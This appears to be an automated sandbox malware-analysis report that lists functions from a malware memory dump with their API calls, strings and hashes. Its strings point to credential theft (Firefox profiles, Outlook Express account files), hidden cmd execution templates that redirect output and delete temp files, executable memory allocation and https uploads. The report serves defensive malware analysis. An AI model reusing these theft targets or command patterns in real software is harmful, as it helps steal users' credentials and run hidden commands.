API String ID: 3276359510-3767230166
Opcode ID: 40f4b19ea90ffb12f867c74ed6d951639f85c7874d1945f825035ff690d22140
Instruction ID: 891b8d2d4d5ea0c1fa00717805784f952266da18347ea8062d08240adbffcc3c
Opcode Fuzzy Hash: 40f4b19ea90ffb12f867c74ed6d951639f85c7874d1945f825035ff690d22140
Instruction Fuzzy Hash: 9C8108B1D102299FCF20EFA4D980AEDBBB9FF48710F1485AAE419E7251D7719A41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02B85EC0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02B85F6B
FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 02B85FD2
GetLastError.KERNEL32(?,00000000,00000000), ref: 02B85FDC

Strings

P, xrefs: 02B85F8F
K, xrefs: 02B85F93

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: BuffersErrorFileFlushLastmemset
String ID: K$P
API String ID: 3817869962-420285281
Opcode ID: 72642070bf1c2b291faa3b1d15e3642fd86c019461a0cfd37c5ea73a4c8fa65f
Instruction ID: dc85be2e46708f17c911e785e9bfad21cc2088ba15e7610ef2e85e41fa565a99
Opcode Fuzzy Hash: 72642070bf1c2b291faa3b1d15e3642fd86c019461a0cfd37c5ea73a4c8fa65f
Instruction Fuzzy Hash: C2417D71A007059FDB34DFA8CE846AABBF6FF08704F95496DE48A93A80E734E544CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B85745, Relevance: 8.9, APIs: 7, Instructions: 106stringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,02B809E2,00000000,?,?,?,02B809E2,?,?,?,?,?), ref: 02B85783
lstrlen.KERNEL32(02B809E2,?,?,?,02B809E2,?,?,?,?,?), ref: 02B85795
memcpy.NTDLL(?,?,?,?,?,?,?), ref: 02B85809
lstrlen.KERNEL32(02B809E2,00000000,00000000,?,?,?,02B809E2,?,?,?,?,?), ref: 02B8581E
lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 02B85837
memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 02B85840
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 02B8584E

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrlenmemcpy$FreeLocal
String ID:
API String ID: 1123625124-0
Opcode ID: 68c0150e0bf578af263134682bf41fc37f4c038fa037c2596c5b1a5cf32a1b84
Instruction ID: e724581e979df30cab7569aaeb60d6fd4fe3ed1d6be1cb92658483b7fbf276a5
Opcode Fuzzy Hash: 68c0150e0bf578af263134682bf41fc37f4c038fa037c2596c5b1a5cf32a1b84
Instruction Fuzzy Hash: A13119B680021AAFCF21AF69DD418DF3FA9EF152A4B454565FC1896210E731DE60CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 02B7C790, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B82891: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000100,?,?,?), ref: 02B8289F

RtlAllocateHeap.NTDLL(00000000,?), ref: 02B7C7F1
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02B7C840

Part of subcall function 02B84241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,02B81ED8), ref: 02B84282
Part of subcall function 02B84241: GetLastError.KERNEL32 ref: 02B8428C
Part of subcall function 02B84241: WaitForSingleObject.KERNEL32(000000C8), ref: 02B842B1
Part of subcall function 02B84241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 02B842D2
Part of subcall function 02B84241: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 02B842FA
Part of subcall function 02B84241: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 02B8430F
Part of subcall function 02B84241: SetEndOfFile.KERNEL32(00000006), ref: 02B8431C
Part of subcall function 02B84241: CloseHandle.KERNEL32(00000006), ref: 02B84334

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,?,?,02B8314E,?,?,?,?,?,?), ref: 02B7C875
HeapFree.KERNEL32(00000000,?,?,?,?,02B8314E,?,?,?,?,?,?,00000000,?,00000000), ref: 02B7C885

Strings

https://, xrefs: 02B7C7A2

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
String ID: https://
API String ID: 4200334623-4275131719
Opcode ID: 7fc1263ae81ee8b1c3c6609fe48cf471ccb3ce19c613970a654370141a2bf672
Instruction ID: 2fe17abb14590302bc9bdb6f6e6dd23b641688fc41588bfe26164d41ec958f78
Opcode Fuzzy Hash: 7fc1263ae81ee8b1c3c6609fe48cf471ccb3ce19c613970a654370141a2bf672
Instruction Fuzzy Hash: 7C3137B1910019BFEB109BA5CD89DBABB7DFF09384B1005A9F505E3260D771AE61DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B92639, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 02B8F750: memcpy.NTDLL(00000000,00000090,?,?,00000000,00000000), ref: 02B8F78C
Part of subcall function 02B8F750: memset.NTDLL ref: 02B8F808
Part of subcall function 02B8F750: memset.NTDLL ref: 02B8F81D

RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 02B9268D
lstrcmpi.KERNEL32(00000000,Main), ref: 02B926AD
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02B926F2
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,00000000), ref: 02B92703

Strings

Main, xrefs: 02B926A5

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$Freememset$Allocatelstrcmpimemcpy
String ID: Main
API String ID: 1065503980-521822810
Opcode ID: f038252bb10ed82dc58f6c48494f510f36558a0d09247e32ac80b883a08ddfa3
Instruction ID: b64000f9f6fbf16fb1aa462c17f1f27d050dc5fa94196ecdcb15a95bd1f89071
Opcode Fuzzy Hash: f038252bb10ed82dc58f6c48494f510f36558a0d09247e32ac80b883a08ddfa3
Instruction Fuzzy Hash: 72214635A4020ABBDF11AFA5DD44BAE7BAAEB05384F1048A5F905E7160D731AE24DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02B8E9BE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,?,?,00000001), ref: 02B8E9CF
LoadLibraryA.KERNEL32(NTDSAPI.DLL,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B8EA69
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B8EA74

Strings

NTDSAPI.DLL, xrefs: 02B8EA62
NTDLL.DLL, xrefs: 02B8E9CA

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Library$FreeHandleLoadModule
String ID: NTDLL.DLL$NTDSAPI.DLL
API String ID: 2140536961-3558519346
Opcode ID: add2bb483be729054f5fabf248846789597105c79c637efdf3511b5cdc8d86bf
Instruction ID: 3a4a73549a9fe3f231403948337509c0c259593e11e9cae03dc7a173d99238ac
Opcode Fuzzy Hash: add2bb483be729054f5fabf248846789597105c79c637efdf3511b5cdc8d86bf
Instruction Fuzzy Hash: 9B318D71A043028FDB14EF28D444B6ABBE0FF84719F0449ADF899C7251E770D549CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02B7F4CD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,?,?,02B76709,?,?,?,Salt,?,?,?,Store Root,?), ref: 02B7F4E1

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

mbstowcs.NTDLL ref: 02B7F4FD
lstrlen.KERNEL32(account{*}.oeaccount), ref: 02B7F50B
mbstowcs.NTDLL ref: 02B7F523

Part of subcall function 02B8888D: lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 02B888D9
Part of subcall function 02B8888D: lstrlenW.KERNEL32(?,?,00000000), ref: 02B888E5
Part of subcall function 02B8888D: memset.NTDLL ref: 02B8892D
Part of subcall function 02B8888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 02B88948
Part of subcall function 02B8888D: lstrlenW.KERNEL32(0000002C), ref: 02B88980
Part of subcall function 02B8888D: lstrlenW.KERNEL32(?), ref: 02B88988
Part of subcall function 02B8888D: memset.NTDLL ref: 02B889AB
Part of subcall function 02B8888D: wcscpy.NTDLL ref: 02B889BD

Part of subcall function 02B84FB0: HeapFree.KERNEL32(00000000,00000200,02B86EB2,00000000,00000100,00000200), ref: 02B84FBC

Strings

account{*}.oeaccount, xrefs: 02B7F505, 02B7F50A, 02B7F521

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
String ID: account{*}.oeaccount
API String ID: 1961997177-4234512180
Opcode ID: 4e5390d2f00617bcb6f94341fcd5a00a917d6bcde88687f7817206451a6781e4
Instruction ID: 7c04177d35a1fdcb300596a9f7563e10cc6b65b6a19cd2f30e4aafced0224171
Opcode Fuzzy Hash: 4e5390d2f00617bcb6f94341fcd5a00a917d6bcde88687f7817206451a6781e4
Instruction Fuzzy Hash: 880180B2D10208BBCB207BA5DC86F9F7AADEF85754F1441A5B908A3110EA75DA15CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B84406, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 02B84422
lstrlen.KERNEL32(EMPTY,00000008,00000000,0000010E,00000000,00000000,?,00000000,64F16420,?,02B7B1B4,?,?,00000000,?,?), ref: 02B84456
HeapFree.KERNEL32(00000000,00000000,EMPTY,00000000,?,00000000,64F16420,?,02B7B1B4,?,?,00000000,?,?,00000001,00000000), ref: 02B84472

Strings

EMPTY, xrefs: 02B84450, 02B84455, 02B8445D
log, xrefs: 02B8445E

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen
String ID: EMPTY$log
API String ID: 3886119090-141014656
Opcode ID: 22a72964b670136dc0c13d4ef660ff656cf20fd4be740441c712874161120b6f
Instruction ID: a7fe11e14805da25bde7cc116ccf096399f5e06e6309975e59ca3ee909a4f71a
Opcode Fuzzy Hash: 22a72964b670136dc0c13d4ef660ff656cf20fd4be740441c712874161120b6f
Instruction Fuzzy Hash: 4C012872A00228FBCB3166AA9D4CEAB7B7DDB867E0B280992F108D3100D6B04D90C770

Uniqueness

Uniqueness Score: -1.00%

Function 02B9427B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(02B9E220,02B7C8D3,?,00000000), ref: 02B9427F
GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrRegisterDllNotification,?,00000000), ref: 02B94293
GetProcAddress.KERNEL32(00000000), ref: 02B9429A

Strings

LdrRegisterDllNotification, xrefs: 02B94289
NTDLL.DLL, xrefs: 02B9428E

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: LdrRegisterDllNotification$NTDLL.DLL
API String ID: 3310240892-3368964806
Opcode ID: 818ba92d5eb64eb3e1d842d06c89d81af5ebfdfa50e64d4a3ed97657311badfb
Instruction ID: 4334db753755963cb666bd4e6c1d6c45ecd662d91669d8a1c38a53d2837e880b
Opcode Fuzzy Hash: 818ba92d5eb64eb3e1d842d06c89d81af5ebfdfa50e64d4a3ed97657311badfb
Instruction Fuzzy Hash: A5015270A943019FDB509F769949B127BF5FB06344B54C5F9E689C7260D770C452CF10

Uniqueness

Uniqueness Score: -1.00%

Function 02B78A10, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memorystringCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(02B9DF60,00000000), ref: 02B78A20
RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 02B78A3A
lstrcpy.KERNEL32(00000000,-01), ref: 02B78A5A
HeapFree.KERNEL32(00000000,00000000,02B9DF60,?,00000000,00000000,00000000,?,00000000,02B90F94,00000000,00000000), ref: 02B78A7D

Part of subcall function 02B959F7: SetEvent.KERNEL32(?,02B78A31,?,00000000,02B90F94,00000000,00000000), ref: 02B95A0B
Part of subcall function 02B959F7: WaitForSingleObject.KERNEL32(?,000000FF,0000003C,?,00000000,02B90F94,00000000,00000000), ref: 02B95A25
Part of subcall function 02B959F7: CloseHandle.KERNEL32(?,?,00000000,02B90F94,00000000,00000000), ref: 02B95A2E
Part of subcall function 02B959F7: CloseHandle.KERNEL32(?,0000003C,?,00000000,02B90F94,00000000,00000000), ref: 02B95A3C
Part of subcall function 02B959F7: RtlEnterCriticalSection.NTDLL(00000008), ref: 02B95A48
Part of subcall function 02B959F7: RtlLeaveCriticalSection.NTDLL(00000008), ref: 02B95A71
Part of subcall function 02B959F7: CloseHandle.KERNEL32(?), ref: 02B95A8D
Part of subcall function 02B959F7: LocalFree.KERNEL32(?), ref: 02B95A9B
Part of subcall function 02B959F7: RtlDeleteCriticalSection.NTDLL(00000008), ref: 02B95AA5

Strings

-01, xrefs: 02B78A52

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
String ID: -01
API String ID: 1103286547-1095514728
Opcode ID: 989b515be216ca66383bb580550dae8ab204afd834faacbe76db8d743ba807e9
Instruction ID: fe3d39ab5b6d4c82590be4bdb073a75f41c6e7a3d390439d7d4c04ead5e4d9d0
Opcode Fuzzy Hash: 989b515be216ca66383bb580550dae8ab204afd834faacbe76db8d743ba807e9
Instruction Fuzzy Hash: 1AF0F6B3A801197FDA213BA2AD8CF7B7F5DE74A3E97000AB1F604D3110CA214C20D670

Uniqueness

Uniqueness Score: -1.00%

Function 02B863E9, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,00000000,76D7F720,?,02B7A894,00000000,?,?,?,02B925B8), ref: 02B8640D
GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,02B7A894,00000000,?,?,?,02B925B8), ref: 02B86421
GetProcAddress.KERNEL32(00000000), ref: 02B86428

Strings

LdrUnregisterDllNotification, xrefs: 02B86417
NTDLL.DLL, xrefs: 02B8641C

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: LdrUnregisterDllNotification$NTDLL.DLL
API String ID: 3310240892-3940208311
Opcode ID: db59d1325caaf49f282853674eef9a722c1818522adcf421a43cd1430ebcb43e
Instruction ID: a7db3835ac75eff1cb7ba12932689aef058e090bbdabd1779b582d8d2a4e44a0
Opcode Fuzzy Hash: db59d1325caaf49f282853674eef9a722c1818522adcf421a43cd1430ebcb43e
Instruction Fuzzy Hash: 5801D675640200DFDB10BF28E988A2AB7EDFF4A34871888AAE14DD3325C731E841CF10

Uniqueness

Uniqueness Score: -1.00%

Function 02B74B29, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32 ref: 02B74B2E
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 02B74B43
wsprintfA.USER32 ref: 02B74B58

Part of subcall function 02B7B598: memset.NTDLL ref: 02B7B5AD
Part of subcall function 02B7B598: lstrlenW.KERNEL32(00000000,00000000,00000000,7730DBB0,00000000,cmd /C "%s> %s1"), ref: 02B7B5E6
Part of subcall function 02B7B598: wcstombs.NTDLL ref: 02B7B5F0
Part of subcall function 02B7B598: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7730DBB0,00000000,cmd /C "%s> %s1"), ref: 02B7B621
Part of subcall function 02B7B598: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,02B8793E), ref: 02B7B64D
Part of subcall function 02B7B598: TerminateProcess.KERNEL32(?,000003E5), ref: 02B7B663
Part of subcall function 02B7B598: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,02B8793E), ref: 02B7B677
Part of subcall function 02B7B598: CloseHandle.KERNEL32(?), ref: 02B7B6AA
Part of subcall function 02B7B598: CloseHandle.KERNEL32(?), ref: 02B7B6AF

HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 02B74B74

Strings

cmd /U /C "type %s1 > %s & del %s1", xrefs: 02B74B52

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
String ID: cmd /U /C "type %s1 > %s & del %s1"
API String ID: 1624158581-4158521270
Opcode ID: 227214608266ea10bb72a48dcafcca0a3889cc0096e6472add2d60498640f338
Instruction ID: f9e41e30bbaec456799a946af80ef86331df4033d4469299476f2fc909796cbe
Opcode Fuzzy Hash: 227214608266ea10bb72a48dcafcca0a3889cc0096e6472add2d60498640f338
Instruction Fuzzy Hash: 0FF0A031A811117BD621272AAD0EF2B7E3DDFC3BB5F150661F515E72D0CB208922C9A4

Uniqueness

Uniqueness Score: -1.00%

Function 02B8447F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,.dll,?,00000000,02B7A218,?,.dll,?,00001000,?,?,?), ref: 02B8448D
lstrlen.KERNEL32(DllRegisterServer), ref: 02B8449B
RtlAllocateHeap.NTDLL(00000000,00000022), ref: 02B844B0

Strings

DllRegisterServer, xrefs: 02B84493, 02B84498, 02B844C1
.dll, xrefs: 02B8448B

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$AllocateHeap
String ID: .dll$DllRegisterServer
API String ID: 3070124600-294589026
Opcode ID: c002b3f314328c7b7b8f686bba4448a4f1bd19d0dcf806e943562510d90d57c6
Instruction ID: 0cf028243229dc64c6ba452a3e2f7cf7e2d2f801a085945aefea1f7df03f814a
Opcode Fuzzy Hash: c002b3f314328c7b7b8f686bba4448a4f1bd19d0dcf806e943562510d90d57c6
Instruction Fuzzy Hash: 46F0B473D41121ABD3206A99DD88F57BBACEB497847090A62FA09D3201D6309820C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 02B7F675, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(05AE8D20), ref: 02B7F67E
Sleep.KERNEL32(0000000A,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B7F688
HeapFree.KERNEL32(00000000,?,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B7F6B6
RtlLeaveCriticalSection.NTDLL(05AE8D20), ref: 02B7F6CB

Strings

0123456789ABCDEF, xrefs: 02B7F6A5

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: 0123456789ABCDEF
API String ID: 58946197-2554083253
Opcode ID: a5038205e4a54ff6d29dd21ee21ce28fcd315eabce508fc43759f54d27faa053
Instruction ID: 72cf28518cbcdfccbb4e82f3515795560e16bd64ae1d0e7233b21c55692b089b
Opcode Fuzzy Hash: a5038205e4a54ff6d29dd21ee21ce28fcd315eabce508fc43759f54d27faa053
Instruction Fuzzy Hash: 17F0F874A80200DFEB08DF15EB89B2A3BA5EB05380B04494EF506D77A0C734EC60CE2A

Uniqueness

Uniqueness Score: -1.00%

Function 02B7D570, Relevance: 7.6, APIs: 6, Instructions: 137stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02B80DCC: ExpandEnvironmentStringsW.KERNEL32( F.w,00000000,00000000,00000000,772E4620,00000000,02B75FE6,%userprofile%\AppData\Local\,?,00000000,02B723FE), ref: 02B80DDD
Part of subcall function 02B80DCC: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,00000000,02B723FE), ref: 02B80DFA

lstrlenW.KERNEL32(00000000,00000000,747A06E0,00000020,00750025,80000001), ref: 02B7D5B6
lstrlenW.KERNEL32(00000008), ref: 02B7D5BD
lstrlenW.KERNEL32(?,?), ref: 02B7D5D9
lstrlen.KERNEL32(?,006F0070,00000000), ref: 02B7D653
lstrlenW.KERNEL32(?), ref: 02B7D65F
wsprintfA.USER32 ref: 02B7D68D

Part of subcall function 02B84FB0: HeapFree.KERNEL32(00000000,00000200,02B86EB2,00000000,00000100,00000200), ref: 02B84FBC

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
String ID:
API String ID: 3384896299-0
Opcode ID: 12c5d32525aa8176b1d80b368775aef30722d768571348efa0f9949aed279c94
Instruction ID: 30b0005cfe804a7ee418e78ddef0fa970752d5ebfd59361182f9bae11fed7032
Opcode Fuzzy Hash: 12c5d32525aa8176b1d80b368775aef30722d768571348efa0f9949aed279c94
Instruction Fuzzy Hash: F8411E71D0010ABFCB01EFA8DD45D9E7BBDEF48344B0548A6E918A7221EB71EA14DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02B94670, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 108stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02B77D07: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,02B78663,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,02B81117), ref: 02B77D13
Part of subcall function 02B77D07: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02B78663,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 02B77D71
Part of subcall function 02B77D07: lstrcpy.KERNEL32(00000000,00000000), ref: 02B77D81

lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 02B946BF
wsprintfA.USER32 ref: 02B946EF
GetLastError.KERNEL32 ref: 02B94764

Strings

`, xrefs: 02B94720
Content-Type: application/octet-stream, xrefs: 02B946E3

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
String ID: Content-Type: application/octet-stream$`
API String ID: 324226357-1382853987
Opcode ID: b0e87bd97b678fe53c05373f1936618efe4c446412d18e186099f9891bbb3f07
Instruction ID: e0a50c1fd9e9f15292446f6433ac76ab92c8722f6f771d209bfa48a00313d2b6
Opcode Fuzzy Hash: b0e87bd97b678fe53c05373f1936618efe4c446412d18e186099f9891bbb3f07
Instruction Fuzzy Hash: 4131DD7150020ABBCF22EF61DC80BAA7BB9EF01364F104469F91997250EB35E915CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B839D7, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 02B8B01E: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 02B8B02A
Part of subcall function 02B8B01E: SetLastError.KERNEL32(000000B7,?,02B839EB,?,?,00000000,?,?,?), ref: 02B8B03B

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 02B83A0B
CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 02B83AE3

Part of subcall function 02B73828: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 02B73842
Part of subcall function 02B73828: CreateWaitableTimerA.KERNEL32(02B9E0D4,00000003,?), ref: 02B7385F
Part of subcall function 02B73828: GetLastError.KERNEL32(?,?,02B83A3F,?,?,?,00000000,?,?,?), ref: 02B73870
Part of subcall function 02B73828: GetSystemTimeAsFileTime.KERNEL32(?,00000000,02B83A3F,?,?,?,02B83A3F,?), ref: 02B738B0
Part of subcall function 02B73828: SetWaitableTimer.KERNEL32(00000000,02B83A3F,00000000,00000000,00000000,00000000,?,?,02B83A3F,?), ref: 02B738CF
Part of subcall function 02B73828: HeapFree.KERNEL32(00000000,02B83A3F,00000000,02B83A3F,?,?,?,02B83A3F,?), ref: 02B738E5

GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 02B83ACC
ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 02B83AD5

Part of subcall function 02B8B01E: CreateMutexA.KERNEL32(02B9E0D4,00000000,?,?,02B839EB,?,?,00000000,?,?,?), ref: 02B8B04E

GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 02B83AF0

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
String ID:
API String ID: 1700416623-0
Opcode ID: 2773550e6f1d6e79947d8e1d1b1ca172e9d5d0fad22911643c86365aea2b6020
Instruction ID: cfce56b6cd89154a75821ed70aeec166578827221cb0140053619381bc106a89
Opcode Fuzzy Hash: 2773550e6f1d6e79947d8e1d1b1ca172e9d5d0fad22911643c86365aea2b6020
Instruction Fuzzy Hash: DF31B271E40206AFCB10BF75D98596E7BFAFB89784B1408A6E829D7260D771C851CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02B9220F, Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 02B92228

Part of subcall function 02B73CA4: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,02B8F65A), ref: 02B73CCA

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,02B83EF5,00000000), ref: 02B9226A
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 02B922BC
VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,02B83EF5,00000000), ref: 02B922D5

Part of subcall function 02B945FE: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 02B9461F
Part of subcall function 02B945FE: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,02B9225B,00000000,00000000,00000000,00000001,?,00000000), ref: 02B94662

GetLastError.KERNEL32(?,00000000,02B83EF5,00000000), ref: 02B9230D

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
String ID:
API String ID: 1921436656-0
Opcode ID: 19c458a2c98758bc6421d420fc344009053e2f43fe6b914180accdc598230383
Instruction ID: 0b061c2e9417ab78874013ccb9e8dabe4bef467758e62cdd3987b1d69a63a0bb
Opcode Fuzzy Hash: 19c458a2c98758bc6421d420fc344009053e2f43fe6b914180accdc598230383
Instruction Fuzzy Hash: EB315975E44209BFDF11EFA5D980BAE7BB9EB08390F1045A6ED45A7240D770AA50CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B88291, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON

Download Yara Rule

APIs

Part of subcall function 02B7C71D: lstrlen.KERNEL32(00000000,00000000,?,76D25520,02B882A5,00000000,00000000,00000000,76D25520,?,00000022,00000000,00000000,00000000,?,?), ref: 02B7C729

RtlEnterCriticalSection.NTDLL(02B9E268), ref: 02B882BB
RtlLeaveCriticalSection.NTDLL(02B9E268), ref: 02B882CE
GetSystemTimeAsFileTime.KERNEL32(?), ref: 02B882DF
RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 02B8834A
InterlockedIncrement.KERNEL32(02B9E27C), ref: 02B88361

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

